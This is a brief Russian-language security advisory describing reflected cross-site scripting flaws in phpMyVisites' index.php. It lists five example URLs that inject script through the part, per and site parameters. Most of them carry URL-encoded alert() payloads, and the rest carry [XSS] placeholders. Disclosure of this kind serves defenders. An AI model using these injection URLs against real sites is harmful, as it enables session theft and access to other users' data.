Программа: phpMyVisites 

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры:

http://[target]/phpmyvisites/index.php?part="’/> [XSS]&stats=0

http://[target]/phpmyvisites/index.php?part=configurations&img=1 &stats=1&date=2005-04-23&oldd=2005-04-23&per=1’"/>
[xss]&site=1’"/>[xss]#ancre1

http://[target]/phpmyvisites/index.php?part=%22’/%3E%3C script%3Ealert()%3C/script%3E&stats=0

http://[target]/phpmyvisites/index.php?part=configurations&img=1 &stats=1&date=2005-04-23&oldd=2005-04-23&per=1%22’/
%3E%3Cscript%3Ealert()%3C/script%3E

http://[target]/phpmyvisites/index.php?part=suivi&img=1&stats=1 &date=2005-04-24&oldd=2005-04-24&per=1&site=1’%22%
3E%3Cscript%3Ealert()%3C/script%3E

Оставить мнение